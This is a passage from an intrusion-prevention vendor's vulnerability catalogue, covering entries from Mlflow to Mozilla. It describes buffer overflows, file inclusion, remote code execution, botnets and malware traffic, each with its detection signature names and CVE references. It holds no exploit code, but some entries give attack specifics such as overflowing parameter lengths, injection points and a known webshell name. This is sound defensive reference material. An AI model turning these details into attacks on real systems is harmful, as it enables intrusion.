CVE-2023-6909
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6909
Back to top

Mlflow-Experiments-Local-File-Inclusion-CVE-2024-2928

About this vulnerability: A vulnerability in mlflow
Risk: High
First detected in: sgpkg-ips-1781-5242
Last changed: sgpkg-ips-1781-5242
Platform: Generic
Software: mlflow
Type: Directory Traversal
Description: A local file inclusion vulnerability has been reported in mlflow versions prior to 2.11.3. This vulnerability exists due to the insufficient patch for CVE-2023-6909. A successful exploit allows an unauthenticated attacker to read arbitrary system files, leading into the disclosure of sensitive information such as passwords.
Situation: HTTP_CRL-Mlflow-Experiments-Local-File-Inclusion-Vulnerabilities
References:
CVE-2024-2928
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2928
Back to top

MnoGoSearch-Search-Cgi-Tmplt-Parameter-BOF

About this vulnerability: Buffer overflow in mnoGoSearch search.cgi
Risk: High
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: mnoGoSearch
Type: Buffer Overflow
Description: MnoGoSearch is vulnerable to a buffer overflow, caused by improper bounds checking of parameters passed to the search.cgi script. By passing a "tmplt" parameter containing over 1024 characters to the search.cgi script, a remote attacker could overflow a buffer and cause the program to crash or possibly execute arbitrary code on the system.
Situation: HTTP_CSU-MnoGoSearch-Search-Cgi-Tmplt-Parameter-BOF
References:
CVE-2003-0437
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0437
BID-7866
http://www.securityfocus.com/bid/7866
Back to top

MnoGoSearch-Search-Cgi-Ul-Parameter-BOF

About this vulnerability: Buffer overflow in mnoGoSearch search.cgi
Risk: High
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: mnoGoSearch
Type: Buffer Overflow
Description: MnoGoSearch is vulnerable to a buffer overflow, caused by improper bounds checking of parameters passed to the search.cgi script. By passing a "ul" parameter containing over 5000 characters to the search.cgi script, a remote attacker could overflow a buffer and cause the program to crash or possibly execute arbitrary code on the system.
Situation: HTTP_CSU-MnoGoSearch-Search-Cgi-Ul-Parameter-BOF
References:
CVE-2003-0436
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0436
BID-7865
http://www.securityfocus.com/bid/7865
Back to top

MnoGoSearch-Search-Cgi-Wf-Parameter-BOF

About this vulnerability: Unknown buffer overflow in mnoGoSearch search.cgi
Risk: High
First detected in: sgpkg-ips-14-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: mnoGoSearch
Type: Buffer Overflow
Description: MnoGoSearch is vulnerable to a buffer overflow, caused by improper bounds checking of parameters passed to the search.cgi script. By passing a "wf" parameter containing a large string to the search.cgi script, a remote attacker could overflow a buffer and cause the program to crash or possibly execute arbitrary code on the system.
Back to top

Mobile-Mouse-RCE

About this vulnerability: A vulnerability in Mobile Mouse Server.
Risk: High
First detected in: sgpkg-ips-1514-5242
Last changed: sgpkg-ips-1514-5242
Platform: Windows
Software: Mobile Mouse Server
Type: Insecure Configuration
Description: A vulnerability in Mobile Mouse Server which allows remote attackers to deploy a payload and run it from the server.
Situation: Generic_CS-Mobile-Mouse-RCE
Back to top

MobileIron-Remote-Code-Execution-CVE-2020-15505

About this vulnerability: An attempt to exploit a vulnerability in MobileIron detected
Risk: High
First detected in: sgpkg-ips-1288-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MobileIron
Type: Directory Traversal
Description: There exists a remote code execution vulnerability in MobileIron Core, MobileIron Connector, MobileIron Sentry and MobileIron Monitor and Reporting Database (RDB). Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRL-MobileIron-Remote-Code-Execution-CVE-2020-15505
References:
CVE-2020-15505
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15505
Back to top

Mocbot

About this vulnerability: MocBot
Risk: High
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: MocBot is a worm that spreads by exploiting the remote buffer overflow vulnerability in Microsoft Windows Server Service (MS06-040). It listens to commands via IRC.
Situation: HTTP_CSU-Mocbot-Traffic
Back to top

Mocbot-Botnet

About this vulnerability: Mocbot bonet
Risk: High
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Mocbot is an IRC-controlled bot.
Situation: Generic_CS-IRC-Mocbot-Activity
Back to top

Modbus-SCADA-Directory-Traversal

About this vulnerability: A vulnerability in Modbus SCADA
Risk: High
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Modbus SCADA
Type: Malfunction
Description: There is a directory traversal vulnerability in Modbus SCADA.
Situation: HTTP_CSU-Multiple-Directory-Traversal-Vulnerabilities
Back to top

MODx-Reflect-Base-File-Inclusion

About this vulnerability: File inclusion vulnerability in MODx
Risk: High
First detected in: sgpkg-ips-194-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MODx
Type: Input Validation
Description: There is a file inclusion vulnerability in MODx content manangement system written in PHP scripting language. The software does not validate parameters for snippet.reflect.php script correctly allowing inclusion and execution of arbitary PHP code in the context of the web server process.
Situation: HTTP_CRL-MODx-Reflect-Base-File-Inclusion
References:
OSVDB-50394
http://www.osvdb.org/50394
Back to top

MODX-Revolution-phpthumb.php-CVE-2018-1000207

About this vulnerability: A vulnerability in MODX Revolution
Risk: Moderate
First detected in: sgpkg-ips-1381-5242
Last changed: sgpkg-ips-1381-5242
Platform: Generic
Software: MODX Revolution
Type: Malfunction
Description: An access control vulnerability has been reported in MODX Revolution versions up to 2.6.4. A successful exploitation of this vulnerability could lead in arbitrary file creation and command execution.
Situation: HTTP_CRL-MODX-Revolution-phpthumb.php-CVE-2018-1000207
References:
CVE-2018-1000207
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000207
Back to top

MoinMoin-Remote-Code-Execution

About this vulnerability: A MoinMoin Remote Code Execution vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-705-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MoinMoin
Type: Input Validation
Description: An input validation vulnerability in MoinMoin, versions 1.9.0 through 1.9.5, which allows authenticated remote attackers to execute arbitrary code by first uploading a file with an executable extension via directory traversal, and then executing the file via a direct request.
Situation: HTTP_CSU_MoinMoin-Remote-Code-Execution
References:
CVE-2012-6081
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6081
BID-57082
http://www.securityfocus.com/bid/57082
OSVDB-88825
http://www.osvdb.org/88825
Back to top

Momentum-Botnet

About this vulnerability: Momentum botnet
Risk: High
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Platform: Generic
Software: <os>
Type: Code Injection
Description: Momentum is a malicious botnet that infects Linux-based systems.
Situation: Generic_CS-Momentum-Botnet-C-And-C-Traffic
Back to top

Mongo-Express-Remote-Code-Execution-CVE-2019-10758

About this vulnerability: An attempt to exploit a vulnerability in Mongo Express detected
Risk: High
First detected in: sgpkg-ips-1419-5242
Last changed: sgpkg-ips-1419-5242
Platform: Generic
Software: Mongo Express
Type: Code Injection
Description: An unauthenticated remote code execution vulnerability has been reported in Mongo Express versions before 0.54.0.
Situation: HTTP_CRL-Mongo-Express-Remote-Code-Execution-CVE-2019-10758
References:
CVE-2019-10758
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10758
Back to top

MongoDB-Unauthenticated-Remote-Database-Drop

About this vulnerability: A MongoDB Unauthenticated Remote Database Drop vulnerability
Risk: High
First detected in: sgpkg-ips-947-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux; Windows
Software: MongoDB
Type: Insecure Configuration
Description: A vulnerability in MongoDB which allows remote attackers to execute arbitrary database commands without authentication.
Situation: Generic_CS-MongoDB-Unauthenticated-Remote-Database-Drop
Back to top

Monitorr-Unauthenticated-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in Monitorr detected
Risk: High
First detected in: sgpkg-ips-1654-5242
Last changed: sgpkg-ips-1654-5242
Platform: Windows;Linux;Unix
Software: Monitorr
Type: Input Validation
Description: A vulnerability in Monitorr, versions 1.7.6m, 1.7.7d and below, which allows remote attackers to upload and execute malicious php files through upload.php due to insufficient input validation.
Situation: HTTP_CS-Monitorr-Unauthenticated-Remote-Code-Execution
References:
CVE-2020-28871
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28871
Back to top

Monkif-Bot

About this vulnerability: Monkif Bot
Risk: High
First detected in: sgpkg-ips-619-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Monkif is a Bot that may download additional malicious content on the infected machine.
Situation: File-Text_Monkif-Bot-Traffic
Back to top

MONSOON-Control-Traffic

About this vulnerability: Traffic related to the MONSOON malware campaign
Risk: High
First detected in: sgpkg-ips-789-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Remote Control
Description: Traffic related to the MONSOON malware and espionage campaign has been detected.
Situation: HTTP_CRL-MONSOON-CnC-Traffic
File-TextId_MONSOON-CnC-Traffic
File-Text_MONSOON-CnC-Traffic
Back to top

Montala-Limited-ResourceSpace-Index.php-Cross-Site-Scripting

About this vulnerability: A vulnerability in ResourceSpace
Risk: Moderate
First detected in: sgpkg-ips-1408-5242
Last changed: sgpkg-ips-1408-5242
Platform: Generic
Software: ResourceSpace
Type: Input Validation
Description: A reflected cross-site scripting vulnerability exists in ResourceSpace by Montala Limited. The vulnerability is due to improper input validation of user input passed to index.php page. An unauthenticated user could exploit the vulnerability by sending malicious requests to the target server. Successful exploitation could result in the execution of script code in the security context of the browser of any user visiting the affected pages.
Situation: HTTP_CRL-Montala-Limited-ResourceSpace-Index.php-Cross-Site-Scripting
References:
CVE-2021-41951
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41951
Back to top

Montala-Limited-ResourceSpace-Tiles.php-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in ResourceSpace
Risk: High
First detected in: sgpkg-ips-1408-5242
Last changed: sgpkg-ips-1408-5242
Platform: Generic
Software: ResourceSpace
Type: Directory Traversal
Description: An arbitrary file deletion vulnerability exists in ResourceSpace by Montala Limited. The vulnerability is due to unsanitized parameters used in the titles.php page. A remote, unauthenticated attacker may exploit this vulnerability by sending maliciously crafted HTTP packets. Successful exploitation of this vulnerability could allow attackers to delete arbitrary files on the target system.
Situation: HTTP_CRL-Montala-Limited-ResourceSpace-Tiles.php-Arbitrary-File-Deletion
References:
CVE-2021-41950
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41950
Back to top

Montala-ResourceSpace-User_Functions-SQL-Injection

About this vulnerability: A vulnerability in Montala Limited ResourceSpace
Risk: Moderate
First detected in: sgpkg-ips-1433-5242
Last changed: sgpkg-ips-1433-5242
Platform: Generic
Software: ResourceSpace
Type: Input Validation
Description: Improper input validation in the user_functions.php endpoint causes an SQL injection vulnerability in ResourceSpace by Montala Limited. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Montala-ResourceSpace-User_Functions-SQL-Injection
References:
CVE-2021-41765
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41765
Back to top

Moodle-Admin-Shell-Upload

About this vulnerability: A vulnerability in Moodle.
Risk: High
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1400-5242
Platform: Unix; Linux
Software: Moodle
Type: Malfunction
Description: A vulnerability in Moodle, versions 3.6.3, 3.8.0, 3.9.0, 3.10.0, 3.11.2, which allows remote attackers to execute arbitrary code by sending and installing a crafted plugin which can receive a malicious payload request.
Situation: HTTP_CS-Moodle-Admin-Shell-Upload
References:
CVE-2019-11631
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11631
Back to top

Moodle-Authenticated-Spelling-Binary-RCE

About this vulnerability: A vulnerability in Moodle.
Risk: High
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1399-5242
Platform: Unix; Linux
Software: Moodle
Type: Input Validation
Description: A vulnerability in Moodle, versions 2.5.2 and 2.2.3, which allows remote attackers to execute arbitrary shell commands via the aspellpath variable, due to insufficient input validation.
Situation: HTTP_CRL-Moodle-Authenticated-Spelling-Binary-RCE
References:
CVE-2013-3630
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3630
Back to top

Moodle-Calculated-Question-Remote-Code-Execution-CVE-2018-1133

About this vulnerability: A vulnerability in Moodle
Risk: High
First detected in: sgpkg-ips-1866-5242
Last changed: sgpkg-ips-1866-5242
Platform: Generic
Software: Moodle
Type: Input Validation
Description: An eval injection vulnerability in Moodle 3.x allows an attacker with the teacher role permissions to execute arbitrary code on the server.
Situation: HTTP_CRL-Moodle-Calculated-Question-Remote-Code-Execution-CVE-2018-1133
References:
CVE-2018-1133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1133
Back to top

Moodle-Calculated-Question-Types-Remote-Code-Execution-CVE-2024-43425

About this vulnerability: An attempt to exploit a vulnerability in Moodle detected
Risk: High
First detected in: sgpkg-ips-1820-5242
Last changed: sgpkg-ips-1820-5242
Platform: Generic
Software: Moodle
Type: Input Validation
Description: There is a vulnerability in Moodle that arises from improper handling of calculated question types. An attacker with the ability to add/update calculated question types could exploit it to inject malicious code, leading to remote code execution on the server.
Situation: HTTP_CRL-Moodle-Calculated-Question-Types-Remote-Code-Execution-CVE-2024-43425
References:
CVE-2024-43425
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43425
Back to top

Moodle-Remote-Command-Execution

About this vulnerability: Moodle Remote Command Execution
Risk: Moderate
First detected in: sgpkg-ips-572-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Moodle
Type: Code Injection
Description: There is a remote command execution vulnerability in Moodle. An authenticated user can redirect Moodles spellchecker module to an arbitrary command, allowing remote code execution.
Situation: HTTP_CRL-Moodle-Remote-Command-Execution
References:
CVE-2013-3630
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3630
Back to top

Moodle-SpellChecker-Path-Authenticated-RCE

About this vulnerability: A vulnerability in Moodle.
Risk: High
First detected in: sgpkg-ips-1399-5242
Last changed: sgpkg-ips-1400-5242
Platform: Unix; Linux
Software: Moodle
Type: Input Validation
Description: A vulnerability in Moodle, versions 3.11.2, 3.10.0, and 3.8.0, which allows remote attackers to execute arbitrary code via a backtick shell injection in the aspellpath variable, due to insufficient input validation.
Situation: HTTP_CRL-Moodle-SpellChecker-Path-Authenticated-RCE
References:
CVE-2021-21809
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21809
Back to top

Moodle-Teacher-Enrollment-Privilege-Escalation-To-RCE

About this vulnerability: A vulnerability in Moodle.
Risk: High
First detected in: sgpkg-ips-1400-5242
Last changed: sgpkg-ips-1400-5242
Platform: Unix; Linux
Software: Moodle
Type: Input Validation
Description: A vulnerability in Moodle, version 3.9, which allows remote authenticated attackers to add themselves as a manager, grant themselves system manager permissions, and reconfigure to allow the installation of addon/plugins. RCE is accomplished via a malicious theme upload.
Situation: HTTP_CRL-Moodle-Teacher-Enrollment-Privilege-Escalation-To-RCE
References:
CVE-2020-14321
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14321
Back to top

Morcut-Malware

About this vulnerability: Morcut Malware Traffic
Risk: High
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Morcut
Type: Code Injection
Description: Morcut is a backdoor and rootkit combination installed by a cross-platform Java application which may pretend to be an Adobe updater when downloaded and runs as "Web Enchancer".
Situation: HTTP_CSU-Morcut-Malware-Traffic-Detected
HTTP_CSH-Morcut-Malware-Traffic-Detected
Back to top

Mosca-MQTT-Invalid-Regex-Denial-Of-Service-CVE-2018-11615

About this vulnerability: A vulnerability in Mosca
Risk: High
First detected in: sgpkg-ips-1867-5242
Last changed: sgpkg-ips-1867-5242
Platform: Generic
Software: Mosca
Type: Resource Starvation
Description: A denial of service vulnerability has been reported in npm mosca 2.8.1. An unauthenticated attacker could crash the MQTT broker by subscribing to a topic containing a crafted regular expression.
Situation: Generic_CS-Mosca-MQTT-Invalid-Regex-Denial-Of-Service-CVE-2018-11615
References:
CVE-2018-11615
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11615
Back to top

MosConfig-Absolute-Path-Remote-File-Include-Vulnerability

About this vulnerability: MosConfig Absolute Path Remote File Include Vulnerability
Risk: High
First detected in: sgpkg-ips-336-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Joomla
Type: Input Validation
Description: The Visites component for Joomla! is prone to a remote file-include vulnerability. Successful exploitation of the issue allows the attacker to compromise the application and the remote system. Visites 1.1 RC2 is vulnerable; other versions may also be affected.
Situation: HTTP_CS-MosConfig-Code-Injection-Remote-Compromise-2
HTTP_CSU-MosConfig-Code-Injection-Remote-Compromise
References:
CVE-2010-2918
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2918
BID-28942
http://www.securityfocus.com/bid/28942
Back to top

Motorola-Timbuktu-Crafted-Login-Request-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Motorola Timbuktu Pro
Risk: High
First detected in: sgpkg-ips-119-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Motorola Timbuktu
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in Motorola Timbuktu Pro. A crafted login request to the target host allows arbitrary code execution with the System level privileges.
Situation: Generic_UDP-Motorola-Timbuktu-Crafted-Login-Request-Buffer-Overflow
Generic_Motorola-Timbuktu-Crafted-Login-Request-Buffer-Overflow
References:
CVE-2007-4221
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4221
BID-25454
http://www.securityfocus.com/bid/25454
Back to top

Motorola-Timbuktu-Pro-PlughNTCommand-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in Motorola Timbuktu Pro
Risk: High
First detected in: sgpkg-ips-233-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Motorola Timbuktu Pro
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Motorola Timbuktu Pro. The flaw is due to a boundary error when Motorola Timbuktu Pro handles requests sent to the \PlughNTCommand pipe. Remote attackers could exploit this vulnerability by sending malformed data to the the Timbuktu Pro process, causing either arbitrary code execution in the context of the SYSTEM user, or a denial of service condition.
Situation: SMB-TCP_CS-Motorola-Timbuktu-Pro-PlughNTCommand-Stack-Based-Buffer-Overflow-3
SMB-TCP_CS-Motorola-Timbuktu-Pro-PlughNTCommand-Stack-Based-Buffer-Overflow
SMB-TCP_CS-Motorola-Timbuktu-Pro-PlughNTCommand-Stack-Based-Buffer-Overflow-2
References:
CVE-2009-1394
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1394
BID-35496
http://www.securityfocus.com/bid/35496
Back to top

Motorola-WR850G-Authentication-Bypass

About this vulnerability: A Motorola WR850G Authentication Bypass vulnerability.
Risk: High
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Motorola Router
Type: Insecure Configuration
Description: A vulnerability in Motorola WR850G wireless router, firmware version 4.03, which allows remote attackers to bypass authentication and log in as Administrator by repeatedly making an HTTP request for ver.asp until an administrator logs in.
Situation: HTTP_CS-Motorola-WR850G-Authentication-Bypass
References:
CVE-2004-1550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1550
OSVDB-10232
http://www.osvdb.org/10232
Back to top

Movable-Type-Remote-Code-Execution

About this vulnerability: A Movable Type Remote Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Movable Type
Type: Code Injection
Description: A vulnerability in Movable Type, versions 4.2x and 4.3x through 4.38, which allows remote attackers to conduct eval injection and SQL injections via crafted parameters. This covers CVE-2012-6315 which was labeled a duplicate.
Situation: HTTP_CRL_Movable-Type-Remote-Code-Execution
References:
CVE-2013-0209
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0209
OSVDB-89322
http://www.osvdb.org/89322
Back to top

MOVEit-Transfer-SQL-Injection-Post-Exploit

About this vulnerability: An attempt to exploit a vulnerability in MOVEit detected
Risk: High
First detected in: sgpkg-ips-1597-5242
Last changed: sgpkg-ips-1597-5242
Platform: Generic
Software: MOVEit
Type: SQL Injection
Description: After exploiting the SQL injection vulnerability CVE-2023-34362 of MOVEit Transfer, one of the known webshells is "human2.aspx". This fingerprint aims to block the traffic to and from this webshell. It is not supposed to prevent CVE-2023-34362 from being exploited in the first place.
Situation: File-Text_MOVEit-Transfer-SQL-Injection-Post-Exploit
HTTP_CSH-MOVEit-Transfer-SQL-Injection-Post-Exploit
Back to top

MOXA-Device-Credential-Retrieval

About this vulnerability: A Moxa Device Credential Retrieval vulnerability
Risk: High
First detected in: sgpkg-ips-1028-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Moxa NPort
Type: Insecure Configuration
Description: A vulnerability in Moxa devices with firmware versions older than 2017 or late 2016, which allows remote attackers retrieve admin credentials and SNMP read and read/write community strings without authentication.
Situation: Generic_UDP-MOXA-Device-Credential-Retrieval
References:
CVE-2016-9361
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9361
BID-85965
http://www.securityfocus.com/bid/85965
Back to top

MOXA-Device-Manager-Tool-Buffer-Overflow

About this vulnerability: A MOXA Device Manager Tool Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-786-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MOXA Device Manager Tool
Type: Buffer Overflow
Description: A buffer overflow vulnerability in MOXA Device Manager Tool, versions before 2.3, which allows remote attackers to execute arbitrary code via crafted data in a sission on TCP port 54321.
Situation: Generic_SS-MOXA-Device-Manager-Tool-Buffer-Overflow
References:
CVE-2010-4741
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4741
OSVDB-69027
http://www.osvdb.org/69027
Back to top

Moxa-MXview-Path-Traversal-CVE-2021-38452

About this vulnerability: An attempt to exploit a vulnerability in Moxa MXview
Risk: High
First detected in: sgpkg-ips-1436-5242
Last changed: sgpkg-ips-1436-5242
Platform: Generic
Software: Moxa MXview
Type: Input Validation
Description: A path traversal vulnerability has been reported in Moxa MXview. Successful exploitation of this vulnerability allows unauthenticated attackers to read arbitrary files and gain access to sensitive information, such as the MQTT broker password.
Situation: HTTP_CSU-Moxa-MXview-Path-Traversal-CVE-2021-38452
References:
CVE-2021-38452
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38452
Back to top

MOXA-SoftCMS-Cgi-Program-SQL-Injection

About this vulnerability: A vulnerability in Moxa SoftCMS
Risk: Moderate
First detected in: sgpkg-ips-796-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Moxa SoftCMS
Type: Input Validation
Description: Insufficient validation of URI parameter causes an SQL injection vulnerability in Moxa SoftCMS. A successful exploitation allows an attacker to perform SQL operations and possibly execute code.
Situation: HTTP_CSU-MOXA-SoftCMS-Cgi-Program-SQL-Injection
References:
CVE-2016-5792
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5792
Back to top

Mozart-Loader-Traffic

About this vulnerability: Mozart Loader traffic was detected
Risk: High
First detected in: sgpkg-ips-1237-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Mozart is a Windows-based trojan capable to run arbitrary commands on the infected system.
Situation: DNS-UDP_Mozart-Loader-Traffic
Back to top

Mozi-Botnet-Traffic

About this vulnerability: Mozi botnet traffic was detected
Risk: High
First detected in: sgpkg-ips-1222-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Backdoor
Description: Mozi is a P2P botnet capable to run specific commands or payloads and launch denial-of-service attacks.
Situation: HTTP_CSH-Mozi-Botnet-Traffic
P2P-UDP_Mozi-Botnet-DHT-Traffic
Back to top

Mozilla-BMP-Parsing-Integer-Overflow

About this vulnerability: A vulnerability in Mozilla
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1730-5242
Platform: Generic
Software: Mozilla Browser; Mozilla Firefox; Mozilla Thunderbird; Netscape
Type: Integer Overflow
Description: A vulnerability exists in the way several versions of the Mozilla web browser parses BMP images. The browser is not equipped to handle a BMP image with an overly large width value. This vulnerability may be leveraged by an attacker to execute arbitrary code on a target user's system or create a denial of service condition.
References:
BID-11171
http://www.securityfocus.com/bid/11171
Back to top

Mozilla-Browsers-JavaScript-Argument-Passing-Code-Execution

About this vulnerability: A vulnerability in Mozilla family of browsers
Risk: High
First detected in: sgpkg-ips-99-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla SeaMonkey; Mozilla Thunderbird
Type: Malfunction
Description: There is a memory corruption vulnerability in Mozilla Foundation's family of browser products. The vulnerability is due to an error when processing certain malformed or specially crafted JavaScript code. Successful exploitation of this issue causes a denial of service condition and allows remote attackers to execute arbitrary code in the context of the target browser.
Situation: HTTP_Mozilla-Browsers-JavaScript-Argument-Passing-Code-Execution
File-Text_Mozilla-Browsers-JavaScript-Argument-Passing-Code-Execution
File-Text_Mozilla-Browsers-JavaScript-Argument-Passing-Code-Execution-2
References:
CVE-2007-0777
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0777
BID-22694
http://www.securityfocus.com/bid/22694
OSVDB-32115
http://www.osvdb.org/32115
Back to top

Mozilla-Browsers-JavaScript-InstallVersion-Invalid-Argument-Type

About this vulnerability: A code execution vulnerability in Mozilla browsers
Risk: High
First detected in: sgpkg-ips-99-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Suite; Mozilla Firefox; Netscape
Type: Malfunction
Description: There is a vulnerability in the Mozilla family of browsers. The browser fails to validate the argument type to InstallVersion.compareTo() JavaScript function, leading to code execution in the context of the current user.
Situation: HTTP_Mozilla-Browsers-JavaScript-InstallVersion-Invalid-Argument-Type
File-Text_Mozilla-Browsers-JavaScript-InstallVersion-Invalid-Argument-Type
References:
CVE-2005-2265
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2265
BID-14242
http://www.securityfocus.com/bid/14242
Back to top

Mozilla-Browsers-onUnload-Event-Handler-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in Mozilla Firefox and Seamonkey
Risk: High
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla SeaMonkey
Type: Malfunction
Description: There is a memory corruption vulnerability in Mozilla Firefox and Mozilla Seamonkey. The vulnerability allows remote attackers to execute arbitary code in the context of the current user.
Situation: HTTP_SS-Mozilla-Browsers-onUnload-Event-Handler-Memory-Corruption
File-Text_Mozilla-Browsers-onUnload-Event-Handler-Memory-Corruption
References:
CVE-2007-1092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1092
BID-22679
http://www.securityfocus.com/bid/22679
OSVDB-32103
http://www.osvdb.org/32103
Back to top

Mozilla-CSS-Border-Memory-Corruption

About this vulnerability: A vulnerability in Mozilla
Risk: Moderate
First detected in: sgpkg-ips-157-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox; Mozilla Thunderbird; Mozilla Suite; Mozilla SeaMonkey
Type: Malfunction
Description: There is a vulnerability in various Mozilla-based browsers in the way they handle border definitions in Cascading Style Sheets (CSS). A malicious space may specify out of bound values for border definitions, causing memory corruption that may lead to abnormal termination of the browser or code execution in the context of the current user.
Situation: HTTP_SS-Mozilla-CSS-Border-Memory-Corruption
File-Text_Mozilla-CSS-Border-Memory-Corruption
References:
CVE-2006-1739
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1739
BID-17516
http://www.securityfocus.com/bid/17516
OSVDB-24660
http://www.osvdb.org/24660
Back to top

Mozilla-Firefox-And-Thunderbird-Sensor.dll-Insecure-Library-Loading

About this vulnerability: A vulnerability in Mozilla Foundation Firefox
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Mozilla Firefox; Mozilla Thunderbird
Type: Malfunction
Description: A code execution vulnerability exists in Mozilla Firefox and Thunderbird. The vulnerability is due to a design weakness when the applications attempt to load a dynamic link library (sensor.dll). Remote attackers could exploit this vulnerability by enticing target users to open an HTML page from a WebDAV or an SMB share that also hosts a malicious DLL file. In a successful attack the behaviour of the target host depends entirely on the intended function of the malicious DLL file. In this case, the code would be executed in the security context of the user running the application.
Situation: SMB-TCP_Mozilla-Firefox-And-Thunderbird-Sensor.dll-Insecure-Library-Loading
File-Text_Mozilla-Firefox-And-Thunderbird-Sensor.dll-Insecure-Library-Loading
References:
CVE-2011-2980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2980
BID-49217
http://www.securityfocus.com/bid/49217
OSVDB-74583
http://www.osvdb.org/74583
Back to top

Mozilla-Firefox-Animated-PNG-Processing-Integer-Overflow

About this vulnerability: A vulnerability in Mozilla Firefox
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mozilla Firefox
Type: Integer Overflow
Description: There exists an integer overflow vulnerability in Mozilla Firefox.
Situation: HTTP_SS-Mozilla-Firefox-Animated-PNG-Processing-Integer-Overflow
File-PNG_Mozilla-Firefox-Animated-PNG-Processing-Integer-Overflow
References:
CVE-2008-4064
